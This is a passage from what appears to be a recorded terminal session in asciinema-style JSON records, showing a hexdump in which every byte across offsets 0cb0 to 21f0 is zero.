00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0da0: 00 00 00 00 00 00 00 00 00 00"]
[49.431361, "o", " 00 00 00 00 00 00  ................\r\n  0db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  10f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1110:"]
[49.43149, "o", " 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  11f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  12f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  13f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"]
[49.431768, "o", " 00  ................\r\n  1480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  14f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  15f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  16f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17e0: 00 00 00 00 00"]
[49.432172, "o", " 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  17f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  18f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  19f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  .........."]
[49.432325, "o", "......\r\n  1b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1eb0: 00 00 00 00 00 00 00 00 00 00"]
[49.434818, "o", " 00 00 00 00 00 00  ................\r\n  1ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  1ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  20f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  21f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  